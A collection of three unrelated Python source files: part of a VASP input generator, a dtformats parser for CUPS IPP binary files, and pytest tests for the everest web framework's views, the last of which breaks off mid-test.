        #stopcar    = Stopcar,
        #waveder    = Waveder
        )
    keyword_files = obj(
        incar   = Incar,
        stopcar = Stopcar
        )
    vasp_save_files = all_inputs + all_outputs
    def __init__(self,filepath=None,prefix='',postfix=''):
        if filepath is not None:
            self.read(filepath,prefix,postfix)
        #end if
    #end def __init__
    def read(self,filepath,prefix='',postfix=''):
        """Read all recognized VASP input files found next to filepath."""
        path,tmp = os.path.split(filepath)
        if len(path)>0 and not os.path.exists(path):
            self.error('path {0} does not exist'.format(path))
        #end if
        # os.listdir('') fails; an empty path means the current directory
        if len(path)==0:
            path = '.'
        #end if
        for file in os.listdir(path):
            name = file.lower()
            if name in self.input_files:
                # NOTE(review): 'file' was found by listdir, so prepending
                # prefix/postfix again looks suspect -- confirm the intended
                # on-disk naming convention
                filepath = os.path.join(path,prefix+file+postfix)
                # the original called self.input_files(filepath), i.e. tried
                # to call the lookup table itself; dispatch on the file name
                self[name] = self.input_files[name](filepath)
            #end if
        #end for
    #end def read
    def write(self,filepath,prefix='',postfix=''):
        """Write each contained input file into the directory of filepath."""
        path,tmp = os.path.split(filepath)
        if len(path)>0 and not os.path.exists(path):
            self.error('path {0} does not exist'.format(path))
        #end if
        for name,vfile in self.iteritems():
            filepath = os.path.join(path,prefix+name.upper()+postfix)
            vfile.write(filepath)
        #end for
    #end def write
    def incorporate_system(self,system,incorp_kpoints=True):
        """Fill kpoints and poscar from a physical system description."""
        structure = system.structure
        # assign kpoints
        if len(structure.kpoints)>0 and incorp_kpoints:
            kpoints = Kpoints()
            kpoints.mode     = 'explicit'
            kpoints.coord    = 'cartesian'
            kpoints.kpoints  = structure.kpoints.copy()
            kpoints.kweights = structure.kweights.copy()
            self.kpoints = kpoints
        #end if
        # assign poscar
        if len(structure.elem)>0:
            s = structure.copy()
            species,species_count = s.order_by_species()
            poscar = Poscar()
            poscar.scale      = 1.0
            poscar.axes       = s.axes
            poscar.elem       = species
            poscar.elem_count = species_count
            poscar.coord      = 'cartesian'
            poscar.pos        = structure.pos
            if 'frozen' in structure:
                poscar.dynamic = s.frozen==False
            #end if
            self.poscar = poscar
        #end if
        # handle charged and spin polarized systems
        # jtk mark: todo
    #end def incorporate_system
#end class VaspInput
def generate_vasp_input(**kwargs):
    """Generate a VaspInput from flat keyword arguments.

    The optional 'input_type' keyword selects the generation scheme;
    only 'general' is currently supported.
    """
    # pop with a default replaces the manual membership-check/del pattern
    input_type = kwargs.pop('input_type','general')
    if input_type=='general':
        vi = generate_any_vasp_input(**kwargs)
    else:
        VaspInput.class_error('input_type {0} is unrecognized\nvalid options are: general'.format(input_type))
    #end if
    return vi
#end def generate_vasp_input
# defaults for generate_vasp_input keywords that control formatted files
# (KPOINTS, POSCAR, POTCAR) rather than INCAR/STOPCAR keywords
generate_any_defaults = obj(
    kcenter  = None,
    kpoints  = None,
    kweights = None,
    kbasis   = None,
    kgrid    = None,
    kshift   = (0,0,0),
    kcoord   = 'cartesian',
    system   = None,
    pseudos  = None
    )
def generate_any_vasp_input(**kwargs):
    """Construct a VaspInput from flat keyword arguments.

    Keywords matching generate_any_defaults control the KPOINTS, POSCAR,
    and POTCAR files; all remaining keywords are dispatched to the
    keyword-based files (INCAR/STOPCAR) and must be recognized there.
    """
    # remove keywords associated with kpoints, poscar, and any other formatted files
    vf = obj()
    for name,default in generate_any_defaults.iteritems():
        if name in kwargs:
            vf[name] = kwargs[name]
            del kwargs[name]
        else:
            vf[name] = default
        #end if
    #end for
    # create an empty input file
    vi = VaspInput()
    # assign values to incar and any other keyword files
    keywords = set(kwargs.keys())
    for name,keyword_file in VaspInput.keyword_files.iteritems():
        keys = keywords & keyword_file.keywords
        if len(keys)>0:
            kw = obj()
            kw.move_from(kwargs,keys)
            vfile = keyword_file()
            vfile.assign(**kw)
            vi[name] = vfile
        #end if
    #end for
    # check for leftover keywords
    if len(kwargs)>0:
        VaspInput.class_error('unrecognized keywords: {0}'.format(sorted(kwargs.keys())),'generate_vasp_input')
    #end if
    # set potcar
    if vf.pseudos is not None:
        vi.potcar = Potcar(VaspInput.pseudo_dir,vf.pseudos)
    #end if
    # NOTE(review): 'kspacing' is not among generate_any_defaults, so it can
    # never appear in vf and gen_kpoints is always True -- was this meant to
    # test the original kwargs instead?  confirm before changing behavior
    gen_kpoints = 'kspacing' not in vf
    # incorporate system information
    if vf.system is not None:
        vi.incorporate_system(vf.system,gen_kpoints)
    #end if
    # add kpoints information (override anything provided by system)
    # use 'is not None' throughout: kpoints/kweights/kshift may be numpy
    # arrays, for which '!=None' is elementwise and cannot feed 'or'/'if'
    if gen_kpoints and (vf.kpoints is not None or vf.kweights is not None or vf.kbasis is not None or vf.kgrid is not None or vf.kcenter is not None):
        if 'kpoints' in vi:
            kp = vi.kpoints
            kp.clear()
        else:
            kp = Kpoints()
            vi.kpoints = kp
        #end if
        if vf.kpoints is not None:
            kp.mode     = 'explicit'
            kp.kpoints  = vf.kpoints
            kp.kweights = vf.kweights
            kp.coord    = vf.kcoord
        elif vf.kgrid is not None:
            kp.mode      = 'auto'
            kp.centering = vf.kcenter
            # the redundant inner None-check on kgrid was removed; this
            # branch is only reached when kgrid is not None
            kp.kgrid     = vf.kgrid
            if vf.kshift is not None:
                kp.kshift = vf.kshift
            #end if
        else:
            VaspInput.class_error('could not set kpoints from user inputs','generate_vasp_input')
        #end if
    #end if
    return vi
#end def generate_any_vasp_input
| |
# -*- coding: utf-8 -*-
"""CUPS Internet Printing Protocol (IPP) files."""
import os
from dfdatetime import rfc2579_date_time as dfdatetime_rfc2579_date_time
from dtformats import data_format
from dtformats import errors
class CupsIppFile(data_format.BinaryDataFile):
  """CUPS Internet Printing Protocol (IPP) file."""
  # Using a class constant significantly speeds up the time required to load
  # the dtFabric definition file.
  _FABRIC = data_format.BinaryDataFile.ReadDefinitionFile('cups_ipp.yaml')
  _DELIMITER_TAG_OPERATION_ATTRIBUTES = 0x01
  _DELIMITER_TAG_JOB_ATTRIBUTES = 0x02
  _DELIMITER_TAG_END_OF_ATTRIBUTES = 0x03
  _DELIMITER_TAG_PRINTER_ATTRIBUTES = 0x04
  _DELIMITER_TAG_UNSUPPORTED_ATTRIBUTES = 0x05
  # Deliberately excludes the end-of-attributes tag, which terminates the
  # attributes-group read loop instead of starting a new group.
  _DELIMITER_TAGS = frozenset([
      _DELIMITER_TAG_OPERATION_ATTRIBUTES,
      _DELIMITER_TAG_JOB_ATTRIBUTES,
      _DELIMITER_TAG_PRINTER_ATTRIBUTES,
      _DELIMITER_TAG_UNSUPPORTED_ATTRIBUTES])
  _TAG_VALUE_INTEGER = 0x21
  _TAG_VALUE_BOOLEAN = 0x22
  _TAG_VALUE_ENUM = 0x23
  _TAG_VALUE_DATE_TIME = 0x31
  _TAG_VALUE_RESOLUTION = 0x32
  _TAG_VALUE_TEXT_WITHOUT_LANGUAGE = 0x41
  _TAG_VALUE_NAME_WITHOUT_LANGUAGE = 0x42
  _TAG_VALUE_KEYWORD = 0x44
  _TAG_VALUE_URI = 0x45
  _TAG_VALUE_URI_SCHEME = 0x46
  _TAG_VALUE_CHARSET = 0x47
  _TAG_VALUE_NATURAL_LANGUAGE = 0x48
  _TAG_VALUE_MEDIA_TYPE = 0x49
  _ASCII_STRING_VALUES = frozenset([
      _TAG_VALUE_KEYWORD,
      _TAG_VALUE_URI,
      _TAG_VALUE_URI_SCHEME,
      _TAG_VALUE_CHARSET,
      _TAG_VALUE_NATURAL_LANGUAGE,
      _TAG_VALUE_MEDIA_TYPE])
  _INTEGER_TAG_VALUES = frozenset([
      _TAG_VALUE_INTEGER, _TAG_VALUE_ENUM])
  _STRING_WITHOUT_LANGUAGE_VALUES = frozenset([
      _TAG_VALUE_TEXT_WITHOUT_LANGUAGE,
      _TAG_VALUE_NAME_WITHOUT_LANGUAGE])
  # Human-readable names of tag values, used for debug output only.
  _TAG_VALUE_STRINGS = {
      0x01: 'operation-attributes-tag',
      0x02: 'job-attributes-tag',
      0x03: 'end-of-attributes-tag',
      0x04: 'printer-attributes-tag',
      0x05: 'unsupported-attributes-tag',
      0x0f: 'chunking-end-of-attributes-tag',
      0x13: 'no-value',
      0x21: 'integer',
      0x22: 'boolean',
      0x23: 'enum',
      0x30: 'octetString',
      0x31: 'dateTime',
      0x32: 'resolution',
      0x33: 'rangeOfInteger',
      0x35: 'textWithLanguage',
      0x36: 'nameWithLanguage',
      0x41: 'textWithoutLanguage',
      0x42: 'nameWithoutLanguage',
      0x44: 'keyword',
      0x45: 'uri',
      0x46: 'uriScheme',
      0x47: 'charset',
      0x48: 'naturalLanguage',
      0x49: 'mimeMediaType',
  }
  _DEBUG_INFO_ATTRIBUTE = [
      ('tag_value', 'Tag value', '_FormatIntegerAsTagValue'),
      ('name_size', 'Name size', '_FormatIntegerAsDecimal'),
      ('name', 'Name', None),
      ('value_data_size', 'Value data size', '_FormatIntegerAsDecimal'),
      ('value_data', 'Value data', '_FormatDataInHexadecimal')]
  _DEBUG_INFO_HEADER = [
      ('major_version', 'Major version', '_FormatIntegerAsDecimal'),
      ('minor_version', 'Minor version', '_FormatIntegerAsDecimal'),
      ('operation_identifier', 'Operation identifier',
       '_FormatIntegerAsHexadecimal4'),
      ('request_identifier', 'Request identifier',
       '_FormatIntegerAsHexadecimal8')]
  def __init__(self, debug=False, output_writer=None):
    """Initializes a CUPS Internet Printing Protocol (IPP) file.
    Args:
      debug (Optional[bool]): True if debug information should be written.
      output_writer (Optional[OutputWriter]): output writer.
    """
    super(CupsIppFile, self).__init__(
        debug=debug, output_writer=output_writer)
    # Charset used to decode subsequent string values; updated whenever a
    # charset attribute is read.
    self._last_charset_attribute = 'ascii'
  def _FormatIntegerAsTagValue(self, integer):
    """Formats an integer as a tag value.
    Args:
      integer (int): integer.
    Returns:
      str: integer formatted as a tag value.
    """
    return '0x{0:02x} ({1:s})'.format(
        integer, self._TAG_VALUE_STRINGS.get(integer, 'UNKNOWN'))
  def _ReadAttribute(self, file_object):
    """Reads an attribute.
    Args:
      file_object (file): file-like object.
    Raises:
      ParseError: if the attribute cannot be read.
    """
    file_offset = file_object.tell()
    data_type_map = self._GetDataTypeMap('cups_ipp_attribute')
    attribute, _ = self._ReadStructureFromFileObject(
        file_object, file_offset, data_type_map, 'attribute')
    if self._debug:
      self._DebugPrintStructureObject(attribute, self._DEBUG_INFO_ATTRIBUTE)
    value = None
    if attribute.tag_value in self._INTEGER_TAG_VALUES:
      # TODO: correct file offset to point to the start of value_data.
      value = self._ReadIntegerValue(attribute.value_data, file_offset)
      if self._debug:
        value_string = '{0:d}'.format(value)
        self._DebugPrintValue('Value', value_string)
    elif attribute.tag_value == self._TAG_VALUE_BOOLEAN:
      value = self._ReadBooleanValue(attribute.value_data)
      if self._debug:
        value_string = '{0!s}'.format(value)
        self._DebugPrintValue('Value', value_string)
    elif attribute.tag_value == self._TAG_VALUE_DATE_TIME:
      # TODO: correct file offset to point to the start of value_data.
      value = self._ReadDateTimeValue(attribute.value_data, file_offset)
      if self._debug:
        self._DebugPrintValue('Value', value.CopyToDateTimeString())
    elif attribute.tag_value == self._TAG_VALUE_RESOLUTION:
      # TODO: add support for resolution
      pass
    elif attribute.tag_value in self._STRING_WITHOUT_LANGUAGE_VALUES:
      # Decoded with the charset announced by the last charset attribute.
      value = attribute.value_data.decode(self._last_charset_attribute)
      if self._debug:
        self._DebugPrintValue('Value', value)
    elif attribute.tag_value in self._ASCII_STRING_VALUES:
      value = attribute.value_data.decode('ascii')
      if self._debug:
        self._DebugPrintValue('Value', value)
      # Remember the charset so later string values decode correctly.
      if attribute.tag_value == self._TAG_VALUE_CHARSET:
        self._last_charset_attribute = value
    if self._debug:
      self._DebugPrintText('\n')
  def _ReadAttributesGroup(self, file_object):
    """Reads an attributes group.
    Args:
      file_object (file): file-like object.
    Raises:
      ParseError: if the attributes group cannot be read.
    """
    data_type_map = self._GetDataTypeMap('int8')
    tag_value = 0
    while tag_value != self._DELIMITER_TAG_END_OF_ATTRIBUTES:
      file_offset = file_object.tell()
      tag_value, _ = self._ReadStructureFromFileObject(
          file_object, file_offset, data_type_map, 'tag value')
      # Tag values >= 0x10 mark the start of an attribute; rewind so the
      # attribute map can re-read the tag byte as part of the attribute.
      if tag_value >= 0x10:
        file_object.seek(file_offset, os.SEEK_SET)
        self._ReadAttribute(file_object)
      elif (tag_value != self._DELIMITER_TAG_END_OF_ATTRIBUTES and
            tag_value not in self._DELIMITER_TAGS):
        raise errors.ParseError((
            'Unsupported attributes groups start tag value: '
            '0x{0:02x}.').format(tag_value))
  def _ReadBooleanValue(self, byte_stream):
    """Reads a boolean value.
    Args:
      byte_stream (bytes): byte stream.
    Returns:
      bool: boolean value.
    Raises:
      ParseError: when the boolean value cannot be read.
    """
    if byte_stream == b'\x00':
      return False
    if byte_stream == b'\x01':
      return True
    raise errors.ParseError('Unsupported boolean value.')
  def _ReadDateTimeValue(self, byte_stream, file_offset):
    """Reads a RFC2579 date-time value.
    Args:
      byte_stream (bytes): byte stream.
      file_offset (int): offset of the attribute data relative to the start of
          the file-like object.
    Returns:
      dfdatetime.RFC2579DateTime: RFC2579 date-time stored in the value.
    Raises:
      ParseError: when the datetime value cannot be read.
    """
    data_type_map = self._GetDataTypeMap('cups_ipp_datetime_value')
    try:
      value = self._ReadStructureFromByteStream(
          byte_stream, file_offset, data_type_map, 'date-time value')
    except (ValueError, errors.ParseError) as exception:
      raise errors.ParseError(
          'Unable to parse datetime value with error: {0!s}'.format(exception))
    rfc2579_date_time_tuple = (
        value.year, value.month, value.day,
        value.hours, value.minutes, value.seconds, value.deciseconds,
        value.direction_from_utc, value.hours_from_utc, value.minutes_from_utc)
    return dfdatetime_rfc2579_date_time.RFC2579DateTime(
        rfc2579_date_time_tuple=rfc2579_date_time_tuple)
  def _ReadIntegerValue(self, byte_stream, file_offset):
    """Reads an integer value.
    Args:
      byte_stream (bytes): byte stream.
      file_offset (int): offset of the attribute data relative to the start of
          the file-like object.
    Returns:
      int: integer value.
    Raises:
      ParseError: when the integer value cannot be read.
    """
    data_type_map = self._GetDataTypeMap('int32be')
    try:
      return self._ReadStructureFromByteStream(
          byte_stream, file_offset, data_type_map, 'integer value')
    except (ValueError, errors.ParseError) as exception:
      raise errors.ParseError(
          'Unable to parse integer value with error: {0!s}'.format(exception))
  def _ReadHeader(self, file_object):
    """Reads the header.
    Args:
      file_object (file): file-like object.
    Raises:
      ParseError: if the header cannot be read.
    """
    data_type_map = self._GetDataTypeMap('cups_ipp_header')
    file_offset = file_object.tell()
    header, _ = self._ReadStructureFromFileObject(
        file_object, file_offset, data_type_map, 'header')
    if self._debug:
      self._DebugPrintStructureObject(header, self._DEBUG_INFO_HEADER)
  def ReadFileObject(self, file_object):
    """Reads a CUPS Internet Printing Protocol (IPP) file-like object.
    Args:
      file_object (file): file-like object.
    Raises:
      ParseError: if the file cannot be read.
    """
    self._ReadHeader(file_object)
    self._ReadAttributesGroup(file_object)
    # TODO: read data.
| |
"""
This file is part of the everest project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Created on Nov 17, 2011.
"""
import os
from pkg_resources import resource_filename # pylint: disable=E0611
from pyramid.compat import bytes_
from pyramid.compat import native_
from pyramid.testing import DummyRequest
import pytest
import transaction
from everest.constants import RequestMethods
from everest.mime import CSV_MIME
from everest.mime import CsvMime
from everest.mime import XmlMime
from everest.querying.specifications import eq
from everest.renderers import RendererFactory
from everest.resources.interfaces import IService
from everest.resources.utils import get_collection_class
from everest.resources.utils import get_root_collection
from everest.resources.utils import get_service
from everest.tests.complete_app.entities import MyEntity
from everest.tests.complete_app.fixtures import create_entity_tree
from everest.tests.complete_app.interfaces import IMyEntity
from everest.tests.complete_app.interfaces import IMyEntityChild
from everest.tests.complete_app.interfaces import IMyEntityParent
from everest.tests.simple_app.entities import FooEntity
from everest.tests.simple_app.interfaces import IFoo
from everest.tests.simple_app.resources import FooCollection
from everest.tests.simple_app.resources import FooMember
from everest.tests.simple_app.views import ExceptionPostCollectionView
from everest.tests.simple_app.views import ExceptionPutMemberView
from everest.tests.simple_app.views import UserMessagePostCollectionView
from everest.tests.simple_app.views import UserMessagePutMemberView
from everest.traversal import SuffixResourceTraverser
from everest.utils import get_repository_manager
from everest.views.getcollection import GetCollectionView
from everest.views.static import public_view
from everest.views.utils import accept_csv_only
__docformat__ = 'reStructuredText en'
__all__ = ['TestClassicStyleConfiguredViews',
'TestExceptionView',
'TestGetCollectionView',
'TestMessagingView',
'TestNewStyleConfiguredViews',
'TestPredicatedView',
'TestStaticView',
'TestViewBasicsMemory',
'TestViewBasicsRdb',
'TestWarningViewMemory',
'TestWarningViewRdb',
'TestWarningWithExceptionView',
]
# pytest.yield_fixture is deprecated and was removed in pytest 6.2;
# plain pytest.fixture supports yield fixtures since pytest 3.0.
@pytest.fixture
def view_app_creator(app_creator):
    """App creator with CSV-rendered views registered for MyEntity resources."""
    cfg = app_creator.config
    cfg.add_resource_view(IMyEntity,
                          renderer='csv',
                          request_method=RequestMethods.GET)
    # member views for update operations
    for mth in (RequestMethods.PUT, RequestMethods.PATCH):
        cfg.add_member_view(IMyEntity, renderer='csv', request_method=mth)
    # collection views for creation
    for ifc in (IMyEntity, IMyEntityChild):
        cfg.add_collection_view(ifc,
                                renderer='csv',
                                request_method=RequestMethods.POST)
    # member views for deletion
    for ifc in (IMyEntity, IMyEntityParent):
        cfg.add_member_view(ifc,
                            renderer='csv',
                            request_method=RequestMethods.DELETE)
    cfg.add_member_view(IMyEntity,
                        renderer='csv',
                        name='number',
                        request_method=RequestMethods.DELETE)
    yield app_creator
# pytest.yield_fixture is deprecated (removed in pytest 6.2); plain
# pytest.fixture supports yield fixtures since pytest 3.0.
@pytest.fixture
def msg_view_app_creator(app_creator):
    """App creator with messaging enabled for GET and disabled for PATCH."""
    app_creator.config.add_resource_view(IMyEntity,
                                         renderer='csv',
                                         request_method=RequestMethods.GET,
                                         enable_messaging=True)
    app_creator.config.add_member_view(IMyEntity,
                                       renderer='csv',
                                       request_method=RequestMethods.PATCH,
                                       enable_messaging=False)
    yield app_creator
@pytest.yield_fixture
def pred_view_app_creator(app_creator):
    """App creator with a CSV-only predicated GET collection view."""
    cfg = app_creator.config
    cfg.add_renderer('csv', RendererFactory)
    coll_cls = get_collection_class(IMyEntity)
    cfg.add_view(context=coll_cls,
                 view=GetCollectionView,
                 renderer='csv',
                 request_method=RequestMethods.GET,
                 custom_predicates=(accept_csv_only,))
    yield app_creator
@pytest.fixture
def view_collection(app_creator): #pylint:disable=W0613
    """Root collection populated with two entity trees (ids 0 and 1)."""
    coll = get_root_collection(IMyEntity)
    for ent_id, ent_text in ((0, 'foo0'), (1, 'too1')):
        coll.create_member(create_entity_tree(id=ent_id, text=ent_text))
    return coll
@pytest.fixture
def view_member(view_collection): #pylint: disable=W0621
    """The member with id 0 from the populated view collection."""
    view_collection.filter = eq(id=0)
    member_iter = iter(view_collection)
    return next(member_iter)
@pytest.yield_fixture
def trv_app_creator(app_creator):
    """App creator using the suffix resource traverser."""
    app_creator.config.add_traverser(SuffixResourceTraverser)
    yield app_creator
@pytest.fixture
def trv_view_member(app_creator): #pylint:disable=W0613
    """A committed Foo member with id 0 in the root collection."""
    member = get_root_collection(IFoo).create_member(FooEntity(id=0))
    transaction.commit()
    return member
@pytest.yield_fixture
def static_vw_app_creator(app_creator):
    """App creator serving the 'public' static view from the test data dir."""
    cfg = app_creator.config
    cfg.load_zcml(
        'everest.tests.complete_app:configure_no_rdb.zcml')
    cfg.add_view(context=IService,
                 view=public_view,
                 name='public',
                 request_method=RequestMethods.GET)
    public_dir = resource_filename('everest.tests.complete_app',
                                   'data/original')
    cfg.registry.settings['public_dir'] = public_dir
    yield app_creator
@pytest.yield_fixture
def exc_vw_app_creator(app_creator):
    """App creator whose PUT member / POST collection views raise."""
    cfg = app_creator.config
    cfg.add_member_view(IMyEntity,
                        view=ExceptionPutMemberView,
                        request_method=RequestMethods.PUT)
    cfg.add_collection_view(IMyEntity,
                            view=ExceptionPostCollectionView,
                            request_method=RequestMethods.POST)
    yield app_creator
@pytest.yield_fixture
def wrn_vw_app_creator(app_creator):
    """App creator with user-message (warning) emitting POST/PUT views."""
    get_repository_manager().initialize_all()
    cfg = app_creator.config
    cfg.add_collection_view(FooCollection,
                            view=UserMessagePostCollectionView,
                            request_method=RequestMethods.POST)
    cfg.add_member_view(FooMember,
                        view=UserMessagePutMemberView,
                        request_method=RequestMethods.PUT)
    yield app_creator
@pytest.yield_fixture
def wrn_with_exc_vw_app_creator(app_creator):
    """App creator (no-RDB config) with an exception-raising POST view."""
    cfg = app_creator.config
    cfg.load_zcml(
        'everest.tests.complete_app:configure_no_rdb.zcml')
    cfg.add_view(context=get_collection_class(IMyEntity),
                 view=ExceptionPostCollectionView,
                 request_method=RequestMethods.POST)
    yield app_creator
# We make excessive use of local test fixtures here.
# pylint: disable=W0621
class _TestViewBase(object):
    """CRUD view tests shared by the memory and RDB backend test classes.

    Subclasses supply ``ini_file_path``; all requests go through the
    ``view_app_creator`` fixture web app.
    """
    package_name = 'everest.tests.complete_app'
    app_name = 'complete_app'
    path = '/my-entities/'

    def test_get_collection_defaults(self,
                                     view_app_creator): # pylint:disable=W0621
        res = view_app_creator.get(self.path, status=200)
        assert res is not None

    @pytest.mark.usefixtures('view_collection')
    def test_get_collection_with_slice_larger_max_size(self,
                                                       view_app_creator): # pylint:disable=W0621
        res = view_app_creator.get(self.path,
                                   params=dict(size=10000), status=200)
        assert res is not None

    @pytest.mark.usefixtures('view_collection')
    def test_get_collection_with_invalid_slice_raises_error(self,
                                                            view_app_creator): # pylint:disable=W0621
        # A non-numeric slice size triggers a server error.
        res = view_app_creator.get(self.path,
                                   params=dict(size='foo'), status=500)
        assert res is not None

    @pytest.mark.usefixtures('view_collection')
    def test_get_collection_with_slice_size(self,
                                            view_app_creator): # pylint:disable=W0621
        res = view_app_creator.get(self.path, params=dict(size=1),
                                   status=200)
        assert res is not None

    @pytest.mark.usefixtures('view_collection')
    def test_get_collection_with_slice_start(self,
                                             view_app_creator): # pylint:disable=W0621
        res = view_app_creator.get(self.path,
                                   params=dict(start=1, size=1),
                                   status=200)
        assert res is not None

    @pytest.mark.usefixtures('view_collection')
    def test_get_collection_with_filter(self,
                                        view_app_creator): # pylint:disable=W0621
        res = view_app_creator.get(self.path,
                                   params=dict(q='id:equal-to:0'),
                                   status=200)
        assert res is not None

    @pytest.mark.usefixtures('view_collection')
    def test_get_collection_with_order(self,
                                       view_app_creator): # pylint:disable=W0621
        res = view_app_creator.get(self.path, params=dict(sort='id:asc'),
                                   status=200)
        assert res is not None

    @pytest.mark.usefixtures('view_collection')
    def test_get_collection_with_order_and_size(self,
                                                view_app_creator): # pylint:disable=W0621
        res = view_app_creator.get(self.path,
                                   params=dict(sort='id:asc', size=1),
                                   status=200)
        assert res is not None

    @pytest.mark.usefixtures('view_collection')
    def test_get_collection_with_refs_options(self,
                                              view_app_creator): # pylint:disable=W0621
        # The refs options are not processed by the renderers, so we need
        # a native everest view with a defined response MIME type.
        view_app_creator.config.add_resource_view(
            IMyEntity,
            default_response_content_type=CsvMime,
            request_method=RequestMethods.GET)
        res1 = view_app_creator.get(self.path, params=dict(refs='parent:OFF'),
                                    status=200)
        assert res1 is not None
        assert native_(res1.body).find(',"parent",') == -1
        assert native_(res1.body).find(',"parent.id",') == -1
        res2 = view_app_creator.get(self.path,
                                    params=dict(refs='parent:INLINE'),
                                    status=200)
        assert res2 is not None
        assert native_(res2.body).find(',"parent",') == -1
        assert native_(res2.body).find(',"parent.id",') != -1
        # Bogus refs parameters.
        view_app_creator.get(self.path, params=dict(refs='parent:XXX'),
                             status=500)

    @pytest.mark.usefixtures('view_collection')
    def test_get_member_default_content_type(self,
                                             view_app_creator): # pylint:disable=W0621
        res = view_app_creator.get("%s/0" % self.path, status=200)
        assert res is not None

    def test_put_member(self, view_app_creator, view_member): # pylint:disable=W0621
        req_body = b'"id","text","number"\n0,"abc",2\n'
        res = view_app_creator.put("%s/0" % self.path,
                                   params=req_body,
                                   content_type=CsvMime.mime_type_string,
                                   status=200)
        assert res is not None
        assert view_member.text == 'abc'
        assert view_member.number == 2
        # Changing the ID moves the member to a new location.
        req_body = b'"id","text","number"\n2,"abc",2\n'
        res = view_app_creator.put("%s/0" % self.path,
                                   params=req_body,
                                   content_type=CsvMime.mime_type_string,
                                   status=200)
        assert view_member.id == 2
        assert res.headers['Location'].endswith('2/')

    def test_patch_member(self, view_app_creator, view_member): # pylint:disable=W0621
        req_body = b'"number"\n2\n'
        res = view_app_creator.patch("%s/0" % self.path,
                                     params=req_body,
                                     content_type=CsvMime.mime_type_string,
                                     status=200)
        assert res is not None
        assert view_member.number == 2
        # Changing the ID moves the member to a new location.
        req_body = b'"id"\n2\n'
        res = view_app_creator.patch("%s/0" % self.path,
                                     params=req_body,
                                     content_type=CsvMime.mime_type_string,
                                     status=200)
        assert view_member.id == 2
        assert res.headers['Location'].endswith('2/')

    def test_patch_member_with_xml(self,
                                   view_app_creator, view_member): # pylint:disable=W0621
        view_app_creator.config.add_member_view(
            IMyEntity,
            renderer='xml',
            request_method=RequestMethods.PATCH)
        req_body = \
            b'<tst:myentity xmlns:tst="http://xml.test.org/tests" id="0">' \
            b' <tst:number>2</tst:number>' \
            b'</tst:myentity>'
        res = view_app_creator.patch("%s/0" % self.path,
                                     params=req_body,
                                     content_type=XmlMime.mime_type_string,
                                     status=200)
        assert res is not None
        assert view_member.number == 2

    @pytest.mark.usefixtures('view_collection')
    def test_post_nested_collection_no_parent(self, class_ini,
                                              view_app_creator, view_member): # pylint:disable=W0621
        parent_url = "%s%s/0/" % (class_ini.app_url, self.path)
        req_body = b'"id","text"\n2,"child2"\n'
        res = view_app_creator.post("%schildren" % parent_url,
                                    params=req_body,
                                    content_type=CsvMime.mime_type_string,
                                    status=201)
        assert res is not None
        child_coll = get_root_collection(IMyEntityChild)
        child_mb = child_coll['2']
        assert child_mb.text == 'child2'
        assert child_mb.parent.id == view_member.id

    def test_delete_member(self, view_app_creator, view_collection): # pylint:disable=W0621
        assert len(view_collection) == 2
        res = view_app_creator.delete("%s/0" % self.path,
                                      content_type=CsvMime.mime_type_string,
                                      status=200)
        assert res is not None
        assert len(view_collection) == 1
        # Second delete triggers 404.
        view_app_creator.delete("%s/0" % self.path,
                                content_type=CsvMime.mime_type_string,
                                status=404)
        # A remove operation raising an exception triggers a 500.
        coll_cls = get_collection_class(IMyEntity)
        old_remove = coll_cls.__dict__.get('remove')
        def remove_with_exception(self): # pylint: disable=W0613
            raise RuntimeError()
        coll_cls.remove = remove_with_exception
        try:
            view_app_creator.delete("%s/1" % self.path,
                                    content_type=CsvMime.mime_type_string,
                                    status=500)
        finally:
            if old_remove is not None:
                coll_cls.remove = old_remove
            else:
                # FIX: if the class had no own 'remove', drop the patched
                # method again so it can not leak into other tests.
                del coll_cls.remove

    def test_delete_nested_member(self, view_app_creator, view_member):
        assert view_member.parent is not None
        view_app_creator.delete("%s/0/parent" % self.path,
                                status=200)
        assert view_member.parent is None

    def test_delete_terminal(self, view_app_creator, view_member):
        assert view_member.number is not None
        view_app_creator.delete("%s/0/number" % self.path, status=200)
        assert view_member.number is None
class TestViewBasicsMemory(_TestViewBase):
    """CRUD view tests against the in-memory backend."""
    ini_file_path = resource_filename('everest.tests.complete_app',
                                      'complete_app.ini')

    def test_post_collection(self, view_app_creator): # pylint:disable=W0621
        # This only works in the memory backend because of the referential
        # constraint of the parent attribute.
        new_id = 0
        req_body = b'"id","text","number"\n%d,"abc",2\n' % new_id
        res = view_app_creator.post("%s" % self.path,
                                    params=req_body,
                                    content_type=CsvMime.mime_type_string,
                                    status=201)
        assert res is not None
        coll = get_root_collection(IMyEntity)
        mb = coll[str(new_id)]
        assert mb.text == 'abc'

    def test_post_collection_no_id(self,
                                   view_app_creator): # pylint:disable=W0621
        # This only works in the memory backend because of the referential
        # constraint of the parent attribute.
        req_body = b'"text","number"\n"abc",2\n'
        res = view_app_creator.post("%s" % self.path,
                                    params=req_body,
                                    content_type=CsvMime.mime_type_string,
                                    status=201)
        assert res is not None
        assert res.headers['Location'].endswith(self.path)
        # The backend must have generated a non-empty ID.
        assert native_(res.body).split(os.linesep)[1][:2] != '""'

    @pytest.mark.usefixtures('view_collection')
    def test_post_nested_collection(self, class_ini,
                                    view_app_creator, view_member): # pylint:disable=W0621
        # This only works in the memory backend because it tolerates adding
        # the same entity multiple times.
        child_coll = get_root_collection(IMyEntityChild)
        parent_url = "%s%s/0/" % (class_ini.app_url, self.path)
        req_text = '"id","text","parent"\n2,"child2","%s"\n' % parent_url
        res = view_app_creator.post("%schildren" % parent_url,
                                    params=bytes_(req_text, encoding='utf-8'),
                                    content_type=CsvMime.mime_type_string,
                                    status=201)
        assert res is not None
        child_mb = child_coll['2']
        assert child_mb.text == 'child2'
        assert child_mb.parent.id == view_member.id
@pytest.mark.usefixtures('rdb')
class TestViewBasicsRdb(_TestViewBase):
    # Same CRUD view tests as the memory variant, run against the RDB backend.
    ini_file_path = resource_filename('everest.tests.complete_app',
                                      'complete_app_rdb.ini')
class TestMessagingView(object):
    """Tests for views registered with messaging enabled/disabled."""
    package_name = 'everest.tests.complete_app'
    ini_file_path = resource_filename('everest.tests.complete_app',
                                      'complete_app.ini')
    app_name = 'complete_app'
    path = '/my-entities/'

    def test_get_member_default_content_type(self, msg_view_app_creator): #pylint:disable=W0621
        coll = get_root_collection(IMyEntity)
        ent = MyEntity(id=0)
        coll.create_member(ent)
        res = msg_view_app_creator.get("%s/0" % self.path, status=200)
        assert res is not None

    def test_patch_member(self, msg_view_app_creator): #pylint:disable=W0621
        coll = get_root_collection(IMyEntity)
        ent = MyEntity(id=0)
